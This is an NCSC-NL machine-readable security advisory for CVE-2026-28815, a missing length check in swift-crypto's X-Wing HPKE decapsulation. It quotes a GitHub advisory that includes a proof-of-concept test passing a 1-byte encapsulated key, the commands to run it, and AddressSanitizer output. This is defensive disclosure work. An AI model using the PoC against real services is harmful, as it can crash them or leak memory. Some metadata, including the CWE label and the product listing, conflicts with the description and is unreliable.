{
    "document": {
        "category": "csaf_base",
        "csaf_version": "2.0",
        "distribution": {
            "tlp": {
                "label": "WHITE"
            }
        },
        "lang": "en",
        "notes": [
            {
                "category": "legal_disclaimer",
                "text": "The Netherlands Cyber Security Center (henceforth: NCSC-NL) maintains this portal to enhance access to its information and vulnerabilities. The use of this information is subject to the following terms and conditions:\n\nThe vulnerabilities disclosed in this portal are gathered by NCSC-NL from a variety of open sources, which the user can retrieve from other platforms. NCSC-NL makes every reasonable effort to ensure that the content of this portal is kept up to date, and that it is accurate and complete. Nevertheless, NCSC-NL cannot entirely rule out the possibility of errors, and therefore cannot give any warranty in respect of its completeness, accuracy or real-time keeping up-to-date. NCSC-NL does not control nor guarantee the accuracy, relevance, timeliness or completeness of information obtained from these external sources. The vulnerabilities disclosed in this portal are intended solely for the convenience of professional parties to take appropriate measures to manage the risks posed to cybersecurity. No rights can be derived from the information provided therein.\n\nNCSC-NL and the Kingdom of the Netherlands assume no legal liability or responsibility for any damage resulting from either the use or inability to use the vulnerabilities disclosed in this portal. This includes damage resulting from the inaccuracy or incompleteness of the information contained in it.\nThe information on this page is subject to Dutch law. All disputes related to or arising from the use of this portal regarding the disclosure of vulnerabilities will be submitted to the competent court in The Hague. This choice of means also applies to the court in summary proceedings."
            }
        ],
        "publisher": {
            "category": "coordinator",
            "contact_details": "cert@ncsc.nl",
            "name": "National Cyber Security Centre",
            "namespace": "https://www.ncsc.nl/"
        },
        "title": "CVE-2026-28815",
        "tracking": {
            "current_release_date": "2026-04-03T15:44:44.494659Z",
            "generator": {
                "date": "2026-02-17T15:00:00Z",
                "engine": {
                    "name": "V.E.L.M.A",
                    "version": "1.7"
                }
            },
            "id": "CVE-2026-28815",
            "initial_release_date": "2026-04-03T02:38:40.835672Z",
            "revision_history": [
                {
                    "date": "2026-04-03T02:38:40.835672Z",
                    "number": "1",
                    "summary": "CVE created.| Source created.| CVE status created. (valid)| Description created for source.| Products created (1).| References created (1)."
                },
                {
                    "date": "2026-04-03T02:38:49.864757Z",
                    "number": "2",
                    "summary": "NCSC Score created."
                },
                {
                    "date": "2026-04-03T03:25:06.459361Z",
                    "number": "3",
                    "summary": "Source created.| CVE status created. (valid)| Description created for source.| References created (1)."
                },
                {
                    "date": "2026-04-03T04:39:43.781943Z",
                    "number": "4",
                    "summary": "Source created.| CVE status created. (valid)| Description created for source.| CVSS created.| References created (3).| CWES updated (1)."
                },
                {
                    "date": "2026-04-03T07:35:14.255752Z",
                    "number": "5",
                    "summary": "NCSC Score updated."
                },
                {
                    "date": "2026-04-03T14:26:45.497454Z",
                    "number": "6",
                    "summary": "CVSS created.| CWES updated (1)."
                },
                {
                    "date": "2026-04-03T14:26:48.276426Z",
                    "number": "7",
                    "summary": "NCSC Score updated."
                },
                {
                    "date": "2026-04-03T14:39:43.264107Z",
                    "number": "8",
                    "summary": "CVSS created.| CWES updated (1).| Unknown change."
                },
                {
                    "date": "2026-04-03T14:39:55.106101Z",
                    "number": "9",
                    "summary": "NCSC Score updated."
                },
                {
                    "date": "2026-04-03T15:40:25.766667Z",
                    "number": "10",
                    "summary": "Source connected.| CVE status created. (valid)| EPSS created."
                },
                {
                    "date": "2026-04-03T15:40:37.520678Z",
                    "number": "11",
                    "summary": "NCSC Score updated."
                }
            ],
            "status": "interim",
            "version": "11"
        }
    },
    "product_tree": {
        "branches": [
            {
                "branches": [
                    {
                        "branches": [
                            {
                                "category": "product_version_range",
                                "name": "vers:unknown/4.0.0|<4.3.1",
                                "product": {
                                    "name": "vers:unknown/4.0.0|<4.3.1",
                                    "product_id": "CSAFPID-5986531"
                                }
                            }
                        ],
                        "category": "product_name",
                        "name": "macOS"
                    }
                ],
                "category": "vendor",
                "name": "Apple"
            }
        ]
    },
    "vulnerabilities": [
        {
            "cve": "CVE-2026-28815",
            "cwe": {
                "id": "CWE-787",
                "name": "Out-of-bounds Write"
            },
            "notes": [
                {
                    "category": "description",
                    "text": "A remote attacker can supply a short X-Wing HPKE encapsulated key and trigger an out-of-bounds read in the C decapsulation path, potentially causing a crash or memory disclosure depending on runtime protections. This issue is fixed in swift-crypto version 4.3.1.",
                    "title": "cveprojectv5 - https://raw.githubusercontent.com/CVEProject/cvelistV5/main/cves/2026/28xxx/CVE-2026-28815.json"
                },
                {
                    "category": "description",
                    "text": "A remote attacker can supply a short X-Wing HPKE encapsulated key and trigger an out-of-bounds read in the C decapsulation path, potentially causing a crash or memory disclosure depending on runtime protections. This issue is fixed in swift-crypto version 4.3.1.",
                    "title": "nvd - https://services.nvd.nist.gov/rest/json/cves/2.0?cveId=CVE-2026-28815"
                },
                {
                    "category": "description",
                    "text": "### Summary\n\nThe X-Wing decapsulation path accepts attacker-controlled encapsulated ciphertext bytes without enforcing the required fixed ciphertext length. The decapsulation call is forwarded into a C API, which expects a compile-time fixed-size ciphertext buffer of 1120 bytes. This creates an FFI memory-safety boundary issue when a shorter `Data` value is passed in, because the C code may read beyond the Swift buffer.\n\nThe issue is reachable through initialization of an `HPKE.Recipient`, which decapsulates the provided `encapsulatedKey` during construction. A malformed `encapsulatedKey` can therefore trigger undefined behavior instead of a safe length-validation error.\n\n### Details\n\nThe `decapsulate` function of `OpenSSLXWingPrivateKeyImpl`  does not perform a length check before passing the `encapsulated` data to the C API.\n\n```swift\nfunc decapsulate(_ encapsulated: Data) throws -> SymmetricKey {\n    try SymmetricKey(unsafeUninitializedCapacity: Int(XWING_SHARED_SECRET_BYTES)) { sharedSecretBytes, count in\n        try encapsulated.withUnsafeBytes { encapsulatedSecretBytes in\n            let rc = CCryptoBoringSSL_XWING_decap(\n                sharedSecretBytes.baseAddress,\n                encapsulatedSecretBytes.baseAddress,\n                &self.privateKey\n            )\n            guard rc == 1 else {\n                throw CryptoKitError.internalBoringSSLError()\n            }\n            count = Int(XWING_SHARED_SECRET_BYTES)\n        }\n    }\n}\n```\n\nThe C API does not have a runtime length parameter and instead expects a fixed-size buffer of 1120 bytes.\n\n```c\n#define XWING_CIPHERTEXT_BYTES 1120\n\nOPENSSL_EXPORT int XWING_decap(\n    uint8_t out_shared_secret[XWING_SHARED_SECRET_BYTES],\n    const uint8_t ciphertext[XWING_CIPHERTEXT_BYTES],\n    const struct XWING_private_key *private_key);\n```\n\nSince `decapsulate` accepts arguments of any length, an attacker controlled input can trigger an 
out-of-bounds read. The vulnerable code path can be reached through by initializing a `HPKE.Recipient`. This creates a new `HPKE.Context`, which decapsulates the attacker-controlled `enc` argument:\n\n```swift\ninit<PrivateKey: HPKEKEMPrivateKey>(recipientRoleWithCiphersuite ciphersuite: Ciphersuite, mode: Mode, enc: Data, psk: SymmetricKey?, pskID: Data?, skR: PrivateKey, info: Data, pkS: PrivateKey.PublicKey?) throws {\n    let sharedSecret = try skR.decapsulate(enc)\n    self.encapsulated = enc\n    self.keySchedule = try KeySchedule(mode: mode, sharedSecret: sharedSecret, info: info, psk: psk, pskID: pskID, ciphersuite: ciphersuite)\n}\n```\n\n### PoC\n\nThis PoC constructs an `HPKE.Recipient` using the X-Wing ciphersuite and deliberately passes a 1-byte `encapsulatedKey` instead of the required 1120 bytes. In a normal run, the malformed input is accepted and it reaches the vulnerable decapsulation path, i.e., no size rejection occurs. In an AddressSanitizer run, the same PoC produces a `dynamic-stack-buffer-overflow` read, confirming memory-unsafe behavior.\n\n```swift\n//===----------------------------------------------------------------------===//\n//\n// PoC for X-Wing malformed ciphertext-length decapsulation:\n// X-Wing decapsulation accepts malformed ciphertext length and forwards it to C.\n//\n// This test is intentionally unsafe and is expected to crash (or trip ASan)\n// on vulnerable builds when run.\n//\n//===----------------------------------------------------------------------===//\n\n#if canImport(FoundationEssentials)\nimport FoundationEssentials\n#else\nimport Foundation\n#endif\nimport XCTest\n\n#if CRYPTO_IN_SWIFTPM && !CRYPTO_IN_SWIFTPM_FORCE_BUILD_API\n// Skip tests that require @testable imports of CryptoKit.\n#else\n#if !CRYPTO_IN_SWIFTPM_FORCE_BUILD_API\n@testable import CryptoKit\n#else\n@testable import Crypto\n#endif\n\nfinal class XWingMalformedEncapsulationPoCTests: XCTestCase {\n    func testShortEncapsulatedKeyHPKERecipientInit() 
throws {\n        if #available(iOS 19.0, macOS 16.0, watchOS 12.0, tvOS 19.0, macCatalyst 19.0, *) {\n            let ciphersuite = HPKE.Ciphersuite.XWingMLKEM768X25519_SHA256_AES_GCM_256\n            let skR = try XWingMLKEM768X25519.PrivateKey.generate()\n            let malformedEncapsulatedKey = Data([0x00]) // should be 1120 bytes\n\n            // Vulnerable path: HPKE.Recipient -> skR.decapsulate(enc) -> XWING_decap(...)\n            _ = try HPKE.Recipient(\n                privateKey: skR,\n                ciphersuite: ciphersuite,\n                info: Data(),\n                encapsulatedKey: malformedEncapsulatedKey\n            )\n\n            XCTFail(\"Unexpectedly returned from malformed decapsulation path\")\n        }\n    }\n}\n\n#endif // CRYPTO_IN_SWIFTPM\n```\n\n#### Steps\n\n1. Add the PoC XCTest above to the test suite.\n2. Run the PoC normally to verify that malformed input is not rejected by length:\n   ```bash\n   swift test --filter XWingMalformedEncapsulationPoCTests/testShortEncapsulatedKeyHPKERecipientInit\n   ```\n3. Run the same PoC with AddressSanitizer enabled to detect out-of-bounds memory access:\n   ```bash\n   swift test --sanitize=address --filter XWingMalformedEncapsulationPoCTests/testShortEncapsulatedKeyHPKERecipientInit\n   ```\n\n#### Results\n\n##### Normal run\n\nThe PoC test reaches the `XCTFail` path. `HPKE.Recipient(...)` accepted a `1`-byte X-Wing encapsulated key instead of rejecting it for incorrect length.\n\n```text\nTest Case 'XWingMalformedEncapsulationPoCTests.testShortEncapsulatedKeyHPKERecipientInit' started\n... failed - Unexpectedly returned from malformed decapsulation path\n```\n\n##### AddressSanitizer run\n\nThe sanitizer run aborts with a read overflow while executing the same PoC path. This confirms the memory-safety violation. 
The malformed ciphertext reaches memory-unsafe behavior in the decapsulation chain.\n\n```text\nERROR: AddressSanitizer: dynamic-stack-buffer-overflow\nREAD of size 1\n...\nSUMMARY: AddressSanitizer: dynamic-stack-buffer-overflow\n==...==ABORTING\n```\n\n### Impact\n\nA remote attacker can supply a short X-Wing HPKE encapsulated key and trigger an out-of-bounds read in the C decapsulation path, potentially causing a crash or memory disclosure depending on runtime protections.\n\nReported by Cantina.",
                    "title": "github - https://api.github.com/advisories/GHSA-9m44-rr2w-ppp7"
                },
                {
                    "category": "other",
                    "text": "0.00017",
                    "title": "EPSS"
                },
                {
                    "category": "other",
                    "text": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:L/VI:N/VA:H/SC:N/SI:N/SA:N",
                    "title": "CVSSV4"
                },
                {
                    "category": "other",
                    "text": "8.8",
                    "title": "CVSSV4 base score"
                },
                {
                    "category": "other",
                    "text": "4.0",
                    "title": "NCSC Score"
                },
                {
                    "category": "other",
                    "text": "Is related to (a version of) product Macos, Is related to a product by vendor Apple",
                    "title": "NCSC Score top increasing factors"
                },
                {
                    "category": "other",
                    "text": "The value of the most recent EPSS score, There is cwe data available from source Nvd, The CVSS vector string contains C:H (Confidentiality Impact: High)",
                    "title": "NCSC Score top decreasing factors"
                }
            ],
            "product_status": {
                "known_affected": [
                    "CSAFPID-5986531"
                ]
            },
            "references": [
                {
                    "category": "external",
                    "summary": "Source - cveprojectv5",
                    "url": "https://raw.githubusercontent.com/CVEProject/cvelistV5/main/cves/2026/28xxx/CVE-2026-28815.json"
                },
                {
                    "category": "external",
                    "summary": "Source - nvd",
                    "url": "https://services.nvd.nist.gov/rest/json/cves/2.0?cveId=CVE-2026-28815"
                },
                {
                    "category": "external",
                    "summary": "Source - github",
                    "url": "https://api.github.com/advisories/GHSA-9m44-rr2w-ppp7"
                },
                {
                    "category": "external",
                    "summary": "Source - first",
                    "url": "https://api.first.org/data/v1/epss?limit=10000&offset=0"
                },
                {
                    "category": "external",
                    "summary": "Reference - cveprojectv5; github; nvd",
                    "url": "https://github.com/apple/swift-crypto/security/advisories/GHSA-9m44-rr2w-ppp7"
                },
                {
                    "category": "external",
                    "summary": "Reference - github",
                    "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-28815"
                },
                {
                    "category": "external",
                    "summary": "Reference - github",
                    "url": "https://github.com/advisories/GHSA-9m44-rr2w-ppp7"
                }
            ],
            "scores": [
                {
                    "cvss_v3": {
                        "version": "3.1",
                        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
                        "baseScore": 7.5,
                        "baseSeverity": "HIGH"
                    },
                    "products": [
                        "CSAFPID-5986531"
                    ]
                }
            ],
            "title": "CVE-2026-28815"
        }
    ]
}